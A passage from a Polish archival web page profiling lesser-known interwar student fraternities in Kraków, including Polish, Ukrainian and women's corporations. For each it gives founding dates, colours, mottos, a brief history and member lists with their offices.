 14. Tadeusz Głąb, akt. 1929, olderman sem. zim. 1929/30
 15. Józef Golka, członek Komisji Rewizyjnej sem. let. 1930/31
 16. Jan Guzik, wiceprezes sem. let. 1928/29, wiceprezes sem. zim. 1929/30, przewodniczący Komisji Rewizyjnej sem. let. 1929/30, olderman sem. zim. 1930/31
 17. Jerzy Hmielorz, z Małej Dąbrówki, student fil. UJ, założyciel Jagellonii, prezes sem. zim. 1933/34, członek Komisji Rewizyjnej sem. let. 1933/34, członek Komisji Rewizyjnej sem. let. 1934/35
 18. Jan Janik, z Królewskiej Huty, student fil. UJ, założyciel Jagellonii
 19. Juliusz (Julian) Jaśkiewicz, z Krakowa, student prawa UJ, założyciel Jagellonii, sekretarz sem. zim. i sem. let. 1930/31
 20. Zdzisław Kowalik, student prawa UJ, założyciel Jagellonii
 21. Helmut Kurzelok, członek Komisji Rewizyjnej sem. zim. i sem. let. 1933/34
 22. Roman Lechner, członek Komisji Rewizyjnej sem. zim. 1930/31
 23. Klemens Mańka, z Będzina, student med. UJ, założyciel Jagellonii
 24. Brunon Masoń, z Droniowiczek, student fil. UJ, założyciel Jagellonii
 25. Tobiasz Miecz,
 26. Kazimierz Milata, z Cieszyna, student fil. UJ, założyciel Jagellonii, olderman sem. zim. 1933/34, prezes sem. let. 1933/34, olderman sem. let. 1934/35
 27. Kazimierz Morawiec, z Zawiercia, student fil. UJ, założyciel Jagellonii
 28. Kazimierz Parkita, z Sosnowca, student fil. UJ, założyciel Jagellonii
 29. Władysław Piechowicz, z Krościenka, student prawa UJ, założyciel Jagellonii
 30. Ferdynand Pieprzak-Czajkowski, z Czechosłowacji, student fil. UJ, założyciel Jagellonii
 31. Kazimierz Pięta, członek Komisji Rewizyjnej sem. let. 1929/30
 32. Edmund Pyka, sekretarz sem. let. 1933/34, wiceprezes i sekretarz sem. let. 1934/35
 33. Wilhelm Pyka, z Orzegów, student fil. UJ, założyciel Jagellonii, członek Komisji Rewizyjnej sem. zim. 1933/34
 34. Roman Rutko, członek Komisji Rewizyjnej sem. let. 1930/31
 35. Józef Ryguła, z Rozdzienia, student fil. UJ, założyciel Jagellonii, członek Komisji Rewizyjnej sem. zim. i sem. let. 1933/34, członek Komisji Rewizyjnej sem. let. 1934/35
 36. Władysław Sadowski, sekretarz sem. let. 1929/30
 37. Marian Schindler, z Borysławia, student prawa UJ, założyciel Jagellonii
 38. Henryk Sokół, student prawa UJ, założyciel Jagellonii
 39. Roman Sożewski, prezes sem. zim. i sem. let. 1930/31
 40. Antoni Surman, prezes sem. let. 1928/29
 41. Włodzimierz Szwabowicz, członek Komisji Rewizyjnej sem. let. 1930/31
 42. Eryk Szymura, z Nowej Wsi, student prawa UJ, założyciel Jagellonii, skarbnik sem. zim. 1933/34, olderman sem. let. 1933/34, członek Komisji Rewizyjnej sem. let. 1934/35
 43. Wilhelm Śniechota, z Murcki, student prawa UJ, założyciel Jagellonii, wiceprezes sem. zim. i sem. let. 1933/34
 44. Jerzy Świerzyński, skarbnik sem. zim. i sem. let. 1930/31
 45. Mieczysław Tobiasz, sekretarz sem. let. 1928/29, prezes sem. zim. 1929/30
 46. Jan Wacowski, z Warszawy, student prawa UJ, założyciel Jagellonii
 47. Włodzimierz Wielgus, olderman sem. let. 1929/30
 48. Jan Zionek, skarbnik sem. let. 1928/29
 49. Zdzisław Żelazny, wiceprezes sem. let. 1929/30

XII. Polska Katolicka Korporacja Fidelia w Krakowie

Data powstania: 1929 r.
Barwy: fioletowa – srebrna – czerwona
Dewiza: „Deo, deinde patriae gloria esto” („Bogu, a następnie Ojczyźnie niech będzie chwała”)

Rys historyczny

Fidelia powstała w początkach 1929 r. Zgodnie z przyjętym w stowarzyszeniu założeniem, wzorem dla członków Fidelii był Tadeusz Kościuszko.

Należała do korporacji chrześcijańskich i od 1930 r. była członkiem Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

Komitet organizacyjny wystąpił z wnioskiem z dnia 19 III (?) 1929 r. do uniwersyteckiego Senatu o legalizację korporacji. Senat zatwierdził statut Fidelii uchwałą z dnia 12 III (?) 1929 r. Kuratorem korporacji został prof. Jerzy Smoleński. Cztery lata później w związku z brakiem aktywności Senat rozwiązał stowarzyszenie uchwałą z dnia 31 III 1933 r.

W 1931 r. siedziba Fidelii mieściła się przy ul. Kanonicznej 15 (razem z katolicką organizacją “Odrodzenie”).

Całkowita ustalona, niekompletna imienna lista członków obejmuje 17 nazwisk.

Lista członków

 1. Bronisław Chudecki, skarbnik sem. zim. 1929/30
 2. Jerzy Dulkowski, referent społeczny sem. zim. 1931/32
 3. Stanisław Gregorczyk, sekretarz sem. zim. 1930/31
 4. Jakób Kafel, sekretarz sem. zim. 1929/30, skarbnik sem. let. 1929/30, członek Komisji Rewizyjnej sem. zim. 1930/31
 5. W. Kaliksta, założyciel Fidelii, członek Komisji Rewizyjnej sem. zim. i sem. let. 1929/30
 6. Piotr Kokoryk, wiceprezes sem. zim. 1929/30, prezes sem. let. 1929/30, członek Komisji Rewizyjnej sem. zim. 1930/31
 7. Stanisław Konopka, olderman sem. zim. 1931/32
 8. Władysław Kozień, olderman sem. zim. i sem. let. 1929/30
 9. Czesław Łapiński, student medycyny UJ, prezes sem. zim. 1931/32
 10. Jan Osiński, skarbnik sem. zim. 1930/31, wiceprezes sem. zim. 1931/32
 11. M. Osiński, skarbnik sem. let. 1929/30
 12. Tadeusz Ostrowski, członek Komisji Rewizyjnej sem. zim. i sem. let. 1929/30
 13. Marian Otto, wiceprezes sem. let. 1929/30, wiceprezes sem. zim. 1930/31
 14. Karol Pełka, olderman sem. zim. 1930/31
 15. Stanisław Perkowski, założyciel Fidelii, prezes sem. zim. 1929/30, członek Komisji Rewizyjnej sem. zim. 1930/31
 16. Stanisław Sokół, skarbnik sem. zim. 1931/32
 17. Janusz Stolarski, prezes sem. zim. 1930/31

XIII. Patricia

Data powstania: 1929 r.
Barwy: srebrna – złota – czerwona
Dewiza: „Dobrobyt i praca jednostek podstawą potęgi Państwa”

Rys historyczny

Patricia powstała w 1929 r. Skupiała słuchaczy Wyższego Studium Handlowego w Krakowie. Korporacja stawiała sobie za cel pracę na rzecz lepszego rozumienia potrzeb życia gospodarczego Państwa, handlu i przemysłu.

Od dnia 9 VIII 1929 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 9 VIII 1929 r.). Ponieważ Wyższe Studium Handlowe nie posiadało praw akademickich, Patricia została przyjęta na prawach członka nadzwyczajnego. W 1930 r. (1931 r. ?) została skreślona z listy związków członkowskich. Należała do grupy korporacji, które w 1932 r. stworzyły sanacyjny związek międzykorporacyjny - Federację Polskich Korporacji Akademickich.

Prawdopodobnie po 1933 r. zaprzestała działalności.

Pieczęć Czarnomore, 1934 r.

XIV. Korporacja “Czarnomore” Studentów Ukraińców w Krakowie

Data powstania: przed 1930 r.
Barwy: czarna – niebieska – czarna
Dewiza: ?

Rys historyczny

Data powstania Czarnomore nie jest znana. Pierwsze wiadomości o istnieniu stowarzyszenia pochodzą z 1929 r., kiedy kuratorem związku był prof. Włodzimierz Semkowicz. Dnia 21 III 1935 r. Senat Uniwersytetu zatwierdził uchwałę zebrania Czarnomore o samorozwiązaniu korporacji.

Pieczęć Chortycii, 1933 r.

XV. Korporacja Ukraińskich Studentów “Chortycia” w Krakowie

Data powstania: przed 1931 r.
Barwy: niebieska – wiśniowa – niebieska
Dewiza: „Cześć i braterstwo”

Rys historyczny

Data powstania Chortycii nie jest znana. Pierwsze wiadomości o istnieniu korporacji pochodzą z 1930 r. Zatwierdzenie statutu stowarzyszenia przez uniwersytecki Senat nastąpiło uchwałą z dnia 12 XII 1933 r. Kuratorem został prof. Kazimierz Moszyński. Dwa lata później w związku z brakiem aktywności na wniosek kuratora Senat uchwałą z dnia 12 VII 1935 r. rozwiązał Chortycię.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 25 nazwisk.

Lista członków

 1. Jan Baranyk, student prawa UJ, akt. 1934
 2. Wołodimir Biłyńśkyj, student prawa UJ, akt. 1934
 3. Marian Derewianko, akt. 1931-32, sekretarz sem. zim. 1931/32
 4. Teodor Greśko, student prawa (lub Wydziału Filozofii) UJ, akt. 1930-34
 5. Michał Iwanyćkyj, student prawa UJ, akt. 1933-34, wiceprezes sem. let. 1933/34
  Adam Jakimów (Jakiemiw), student WF UJ, akt. 1932-33

 6. Piotr Janusz, student prawa UJ, akt. 1934
 7. Sozont Kaczała, student prawa UJ, akt. 1930-33, wiceprezes sem. zim. 1931/32
 8. Mikołaj Kłymyszyn, student Wydziału Filozoficznego UJ, akt. 1931-33, wiceprezes sem. let. 1930/31, wiceprezes sem. let. 1931/32, prezes sem. zim. 1932/33
 9. Grzegorz Komaryńskij, student prawa UJ, akt. 1934
 10. Jarosław Kowalów (Kowaliw), student prawa UJ, akt. 1931-32, prezes sem. zim. 1931/32
 11. Jan Kozij, student prawa UJ, akt. 1932-34, sekretarz sem. let. 1933/34
 12. Włodzimierz Martyneć, student med. UJ, akt. 1930-31, sekretarz sem. zim. 1930/31, prezes sem. let. 1930/31
 13. Stepan Miszkiewicz, student prawa UJ, akt. 1930-32
 14. Stepan Mohryj (Mokryj), student prawa UJ, akt. 1933-34, sekretarz sem. zim. 1933/34
 15. Dymitr Parchuć, student prawa UJ, akt. 1933-34, sekretarz sem. let. 1932/33, wiceprezes sem. zim. 1933/34
 16. Marian Pasiczyński, student prawa UJ, akt. 1930-31, prezes sem. zim. 1930/31
 17. Włodzimierz Ryżewśkij, student prawa UJ, akt. 1930-33, sekretarz sem. let. 1931/32, wiceprezes sem. zim. 1932/33
 18. Jan Samaryk, student prawa UJ, akt. 1932-34, sekretarz sem. zim. 1932/33, wiceprezes sem. let. 1932/33, prezes sem. zim. oraz sem. let. 1933/34
 19. Roman Skołozdra, akt. 1931
 20. Eustachy Smułka, student Wydziału Filozofii UJ, akt. 1932-33
 21. Józef Stawnycznyj, student prawa UJ, akt. 1930-33, prezes sem. let. 1931/32, prezes sem. let. 1932/33
 22. Aleksander Suszkiw, student med. UJ, akt. 1930-31, wiceprezes sem. zim. 1930/31
 23. Mykoła Wilczyńskij, student rolnictwa UJ, akt. 1933
 24. Chirosław Wileżyńskij, student I roku rolnictwa UJ, akt. 1932-33
 25. Aleksander Żyznewskij, student prawa UJ, akt. 1930-31

XVI. Słowiańska Korporacja Akademicka Fraternitas Slavia w Krakowie

Data powstania: 28 II 1931 r.
Barwy: brązowa – złota – bordowa
Dewiza: „Jedność, Braterstwo, Zgoda”

Rys historyczny

Fraternitas założyło dziesięciu krakowskich studentów dnia 28 II 1931 r. Wniosek z dnia 29 V 1931 r. o legalizację wniesiono na Uniwersytet dnia 28 VI 1931 r. Zgodnie z przyjętymi założeniami korporacja miała mieć charakter wielonarodowościowy. Członkami mogli być Słowianie, wyznania chrześcijańskiego studiujący na wyższych uczelniach Krakowa (Uniwersytet Jagielloński, Akademia Górnicza, Akademia Sztuk Pięknych). Brak wiadomości o dalszych losach organizacji.

Całkowita ustalona imienna lista członków obejmuje dziesięć nazwisk.

Lista członków

 1. Wasyl Baczwarow, założyciel Fraternitas 1931
 2. Tadeusz Boligłowa, założyciel Fraternitas 1931
 3. Jan R. Czarniecki, założyciel Fraternitas 1931
 4. Stanisław Dobosz, założyciel Fraternitas 1931
 5. Marian Fischer, założyciel Fraternitas 1931
 6. Mieczysław Kopczyński, założyciel Fraternitas 1931, pierwszy sekretarz sem. let. 1930/31
 7. Aleksander Leśniewicz, założyciel Fraternitas 1931, pierwszy prezes sem. let. 1930/31
 8. Zdzisław Rete, założyciel Fraternitas 1931
 9. Leonid Sadowski, założyciel Fraternitas 1931
 10. Aleksander Zewjerzejew, założyciel Fraternitas 1931

XVII. Korporacja Studentek Uniwersytetu Jagiellońskiego Astrea w Krakowie

Data powstania: 7 V 1931 r.
Barwy: biała – złota – ciemnoczerwona
Dewiza: „Per aspera ad astra” („Przez ciernie do gwiazd”)

Rys historyczny

Zebranie założycielskie Astrei, na którym przyjęto także statut, odbyło się dnia 7 V 1931 r. Ideowość korporacji opierała się o założenia programowe Związku Polskich Korporacji Akademickich. Senat Uniwersytetu zatwierdził statut Astrei dnia 24 X 1931 r. Jednak kilkanaście miesięcy później w związku z brakiem aktywności Astrea została rozwiązana uchwałą Senatu z dnia 27 (?) II 1933 r.

Całkowita ustalona, fragmentaryczna imienna lista członkiń obejmuje pięć nazwisk.

Lista członków

 1. Eustachja Hetmaniukowa, założycielka Astrei, prezeska 1931
 2. Jadwiga Krużanka, studentka rolnictwa UJ, założycielka Astrei
 3. Natalia Miczyńska, studentka rolnictwa UJ, założycielka Astrei
 4. Ocetkiewiczówna, założycielka Astrei
 5. Maria Barbara Strokówna, założycielka Astrei, sekretarz 1931

Pieczęć Zaproża, 1933 r.

XVIII. Korporacja Studentów Ukraińskich “Zaporoże” w Krakowie

Data powstania: 15 VI 1931 r.
Barwy: zielona – złota – czerwona
Dewiza: „Ojczyzna, honor, braterstwo” (do 1934 r. „Honor i braterstwo”)

Rys historyczny

Zaporoże powstała w 1931 r. Komitet organizacyjny korporacji skierował na Uniwersytet pismo z dnia 15 VI 1931 r. z wnioskiem o rejestrację stowarzyszenia. Senat uchwałą z dnia 23 VI 1931 r. zatwierdził statut Zaporoża. Kuratorem korporacji został prof. Tadeusz Lehr-Spławiński.

W dniu 14 III 1937 r. walne zebranie członków korporacji z powodu zmniejszającej się w Krakowie liczby studentów Ukraińców oraz liczby członków Zaporoża podjęło jednomyślną uchwałę o samorozwiązaniu. Pozostały majątek przekazano na rzecz ukraińskiej organizacji społeczno-oświatowej “Proświta” we Lwowie.

Całkowita ustalona, niekompletna imienna lista członkiń obejmuje 34 nazwiska.

Lista członków

 1. Wołodymir Bieńko, student prawa UJ, akt. 1935-37, sekretarz sem. let. 1935/36
 2. Jarosław Bukała, student med. UJ, akt. 1936-37
 3. Roman Czarnobil, student prawa UJ, akt. 1934
 4. Wołodymir Czaus, student prawa UJ, akt. 1936-37
 5. Taras Danysz, student med. UJ, założyciel Zaporoża, akt. 1931-34, pierwszy wiceprezes sem. zim. oraz sem. let. 1931/32, olderman sem. let. 1931/32 (od maja), olderman sem. zim. 1932/33, prezes sem. let. 1932/33 (do maja) oraz sem. let. 1932/33 (od maja), prezes sem. let. 1933/34
 6. Wołodymir Debera, student med. UJ, akt. 1934
 7. Wołodymir Hołowaćkyj, student prawa UJ, akt. 1934
 8. Roman Hrab, student med. UJ, akt. 1931-34, pierwszy olderman sem. zim. oraz sem. let. 1931/32, prezes sem. let. 1931/32 (od maja), wiceprezes sem. let. 1932/33 (do maja), wiceprezes sem. let. 1933/34
 9. Mirosław Hrynyszyn, student Wydziału Filozoficznego UJ, akt. 1936-37
 10. Wołodymir Jaczmińskyj, student prawa UJ, akt. 1934
 11. Zenowjusz Jasenyćkyj, student prawa UJ, założyciel Zaporoża, akt. 1931-33, wiceprezes sem. let. 1931/32 (od maja)
 12. Wołodymir Kabyn, student prawa UJ, akt. 1936
 13. Roman Kiekisz, student prawa UJ, akt. 1934
 14. Wołodymir Konrad, student med. UJ, akt. 1936
 15. Bogdan Kotelko, student Wydziału Filozoficznego UJ, założyciel Zaporoża, akt. 1931-32, sekretarz sem. zim. 1931/32
 16. Bogdan Liszczyński, student Wydziału Filozoficznego UJ, założyciel Zaporoża, akt. 1931-33, pierwszy prezes sem. zim. oraz sem. let. 1931/32, prezes sem. zim. 1932/33
 17. Roman Łysiak, założyciel Zaporoża, akt. 1931
 18. Jarosław Łytwyn, student med. UJ, akt. 1934-37
 19. Jan Makarewycz, student med. UJ, akt. 1932-33, sekretarz sem. let. 1932/33 (do maja) oraz sem. let. 1932/33 (od maja)
 20. Marian Malinowski, student med. UJ, akt. 1934-37, sekretarz sem. let. 1933/34, prezes sem. let. 1935/36, ostatni prezes sem. zim. 1936/37
 21. Włodymir Martyneć (Marynec), student med. UJ, akt. 1932-33, sekretarz sem. zim. 1932/33, olderman sem. let. 1932/33 (od maja)
 22. Grzegorz Matczyszyn, akt. 1937
 23. Mikoła Muzyczak, student prawa UJ, akt. 1934-36
 24. Omel(i)an (Emilian?) Nawrocki, student prawa UJ, akt. 1936-37, ostatni sekretarz sem. zim. 1936/37
 25. Cyryl Rudawśkyj, student med. UJ, akt. 1936-37
 26. Jarosław Sałuk, akt. 1931-32, pierwszy sekretarz sem. zim. 1931/32
 27. Bazyli Siokało, student prawa UJ, akt. 1934
 28. Jarosław Sirecki, student Wydziału Filozoficznego UJ, akt. 1936
 29. Aleksander Suszkiw, student med. UJ, akt. 1932-33, sekretarz sem. let. 1931/32 (od maja), wiceprezes sem. zim. 1932/33
 30. Marian Szeremeta, student med. UJ, akt. 1934-37, skarbnik sem. let. 1935/36
 31. Roman Tarnawski, student med. UJ, akt. 1934-36
 32. Teodozy Tomaszek, student prawa UJ, akt. 1934
 33. Teodor Tresznewśkyj, akt. 1931-33, wiceprezes sem. let. 1932/33 (od maja)
 34. Stepan Wolanyk, student prawa UJ, akt. 1934

Pieczęć Zahrawy, 1932 r.

XIX. Korporacja Studentek Ukrainek “Zahrawa” w Krakowie

Data powstania: 5 XII 1931 r.
Barwy: czarna – czerwona (ze złotym obramowaniem)
Dewiza: ?

Rys historyczny

Zahrawa została założona przez sześć ukraińskich studentek dnia 5 XII 1931 r. Senat Uniwersytetu zatwierdził statut korporacji uchwałą z dnia 15 XII 1931 r. Kuratorem Zahrawy został prof. Wojsław Mole. W związku z brakiem od 1934 r. aktywności na wniosek kuratora Senat rozwiązał Zahrawę uchwałą z dnia 4 II 1936 r.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 16 nazwisk.

Lista członków

 1. Maria Badan, studentka med. UJ, akt. 1934
 2. Irena Germak, studentka prawa UJ, założycielka Zahrawy, akt. 1931-34, wiceprezeska sem. zim. oraz sem. let. 1933/34
 3. Daria Hodowaniec, studentka Wydziału Filozoficznego UJ, założycielka Zahrawy, akt. 1931-34
 4. Maria Jasienicka, studentka med. UJ, założycielka Zahrawy, akt. 1931
 5. Aleksandra Jaworska, studentka Wydziału Filozoficznego UJ, akt. 1934
 6. Daria Kostyk, studentka Wydziału Filozoficznego UJ, akt. 1934
 7. Lidia Kozakiewicz, studentka Wydziału Filozoficznego UJ, założycielka Zahrawy, akt. 1931
 8. Olga Krywiak, studentka Wydziału Filozoficznego UJ, założycielka Zahrawy, akt. 1931-34, sekretarz sem. let. 1931/32, prezeska sem. zim. 1933/34
 9. Eugenia Łotocka, studentka Wydziału Filozoficznego UJ, akt. 1933-34, sekretarz sem. let. 1933/34
 10. Natalia Łucka,
 11. Maria Łysa, studentka prawa UJ, akt. 1934
 12. Irena Makuszko, studentka prawa UJ, akt. 1933-34, sekretarz sem. zim. 1933/34, prezeska sem. let. 1933/34
 13. Helena Niedźwiecka, studentka prawa UJ, akt. 1934
 14. Maria Ohrymowycz, studentka WF UJ, akt. 1931-32, wiceprezeska sem. let. 1931/32
 15. Maria Przepiórska, studentka Wydziału Filozoficznego UJ, założycielka Zahrawy, akt. 1931-32, prezeska sem. let. 1931/32
 16. Daria Tymoszczuk, studentka Wydziału Filozoficznego UJ, akt. 1934

XX. Polska Akademicka Korporacja Arpada w Krakowie

Data powstania: 1932 r.
Barwy: szafirowa – srebrna – fioletowa
Dewiza: „Giszek Magyarorszag feltamadasaban”

Rys historyczny

Arpada została założona najprawdopodobniej w początkach 1932 r. Dnia 13 II 1932 r. zostały złożone wnioski o rejestrację na Uniwersytecie i Akademii Sztuk Pięknych. U podstaw założenia nowej korporacji leżało założenie, że wielkomocarstwowa racja stanu państwa wymaga zbliżenia polsko-węgierskiego. Fundamentami ideowymi miała być religia i etyka Chrystusowa, a patronką Królowa Jadwiga. Przyjęto także, że w przypadku wojny każdy członek Arpady jest zobowiązany wspierać Węgry ochotniczo walcząc przy boku tego narodu.

Należała do grupy korporacji, które w 1932 r. stworzyły sanacyjny związek międzykorporacyjny - Federację Polskich Korporacji Akademickich.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje siedem nazwisk.

Lista członków

 1. T. Cieślikowski, student prawa UJ, założyciel Arpady
 2. Ksawery Konarski, sekretarz sem. let. 1931/32
 3. Stanisław Kulski, student prawa UJ, założyciel Arpady
 4. Eugeniusz Pec, student prawa UJ, założyciel Arpady
 5. Mieczysław Pruszyński, student prawa UJ, założyciel Arpady, prezes sem. let. 1931/32
 6. B. Wąwoźny, student prawa UJ, założyciel Arpady
 7. Zassowski, student prawa UJ, założyciel Arpady

XXI. Sarmathia Cracovie (Sarmatia Cracoviensis ?)

Data powstania: ?
Barwy: ?
Dewiza: ?

Lista członków

 1. Wiesław Kulikowski, (1918-2007) po wojnie na emigracji w Kanadzie, członek Koła Filistrów Polskich Korporacji Akademickich w Montrealu, sekretarz Koła 1969, 1971, skarbnik 1972-74, II skarbnik 1978-79

Listy członków opracowano na podstawie:

1) materiałów archiwalnych z Archiwum Korporacyjnego,
2) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków korporacji.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 30 VIII 2010 r.
Ostatnia zmiana: 2 VI 2013 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Mniejsze i mniej znane korporacje akademickie z Krakowa, (na:) www.archiwumkorporacyjne.pl, stan 2 VI 2013 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }